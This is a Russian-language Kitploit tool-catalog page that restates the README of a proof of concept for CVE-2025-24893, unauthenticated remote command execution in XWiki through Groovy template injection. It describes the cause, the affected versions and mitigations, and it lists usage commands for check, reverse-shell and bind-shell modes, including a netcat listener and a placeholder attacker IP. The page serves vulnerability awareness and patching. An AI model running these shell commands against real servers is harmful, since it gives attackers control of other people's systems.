Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893-PoC — Доказательство концепции для CVE-2025-24893, демонстрирующее неавторизованное удаленное выполнение команд в XWiki через небезопасную серверную оценку шаблонов. | Kitploit
Инструменты/GitHubGitHub/breakingrohit/cve-2025-24893-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubbreakingrohit/cve-2025-24893-poc

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893-PoC

Доказательство концепции для CVE-2025-24893, демонстрирующее неавторизованное удаленное выполнение команд в XWiki через небезопасную серверную оценку шаблонов.

Репозиторий
27 месяцев назадЕщё не проверено

CVE-2025-24893 – Удаленное выполнение команд в XWiki (Proof of Concept)

Обзор

Этот репозиторий содержит контролируемое доказательство концепции (PoC) для CVE-2025-24893 — уязвимости неавторизованного удаленного выполнения команд (RCE) в XWiki.

Уязвимость позволяет злоумышленнику выполнять произвольные команды операционной системы на сервере из-за небезопасной обработки шаблонов и скриптов на стороне сервера.


О XWiki

XWiki — это открытая корпоративная вики-платформа, обычно используемая для:

  • Внутренней документации
  • Баз знаний
  • Порталов совместной работы команд

Поскольку XWiki часто развертывается на серверах, доступных из интернета, уязвимости безопасности в обработке запросов и скриптовой логике могут иметь высокое реальное влияние.


Сводка уязвимости

  • CVE ID: CVE-2025-24893
  • Категория: Внедрение шаблонов на стороне сервера, приводящее к удаленному выполнению команд
  • Вектор атаки: HTTP GET запрос
  • Необходимая аутентификация: Отсутствует
  • Влияние: Выполнение произвольных команд с привилегиями сервера

Коренная причина

Введенные пользователем данные, передаваемые в конечную точку SolrSearch, неправильно проверялись и обрабатывались скриптовым движком Groovy. Это позволяло интерпретировать ввод злоумышленника как исполняемый серверный код, что приводило к выполнению команд на хост-системе.


Затронутые версии

  • Версии XWiki до и включая 15.10.10
  • Исправлено в последующих выпусках

Возможности Proof of Concept

Данный PoC демонстрирует следующее:

  • Режим обнаружения уязвимости Безопасно подтверждает, уязвим ли целевой экземпляр, выполняя безопасное выражение на стороне сервера.

  • Удаленное выполнение команд Демонстрирует выполнение произвольных команд на целевой системе.

  • Выполнение обратной оболочки (Reverse Shell) Устанавливает исходящее shell-соединение с целевой системы на тестовую.

  • Привязка оболочки (Bind Shell) (опционально) Открывает прослушивающую оболочку на целевом хосте (менее надежно, чем обратная оболочка).


Использование

Проверка уязвимости

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

Обратная оболочка (рекомендуется)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

Привязка оболочки

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

Схема атаки высокого уровня

  1. Сформированный запрос отправляется на уязвимую конечную точку SolrSearch
  2. Вредоносные инструкции шаблона внедряются через ввод, контролируемый пользователем
  3. Ввод обрабатывается движком Groovy как доверенный код
  4. На сервере выполняются произвольные команды операционной системы

Рекомендации по смягчению

  • Немедленно обновите XWiki до исправленной версии
  • Ограничьте доступ к внутренним конечным точкам, где это возможно
  • Ограничьте или изолируйте функциональность серверных скриптов
  • Мониторьте журналы приложения на предмет аномального выполнения шаблонов

Отказ от ответственности

Этот проект предоставляется строго для образовательных целей и авторизованного тестирования безопасности.

Любое несанкционированное использование этого кода против систем без явного разрешения запрещено.


Авторы

  • Оригинальное исследование уязвимости и вдохновение для PoC — Al Baradi Joy
  • Рефакторинг и расширение для образовательных и защитных целей безопасности

Цель этого репозитория

Этот репозиторий создан для демонстрации:

  • Анализа реальных уязвимостей
  • Безопасной и ответственной разработки доказательств концепции
  • Понимания рисков внедрения шаблонов на стороне сервера и RCE
  • Защитной осведомленности и стратегий смягчения

Скачать инструмент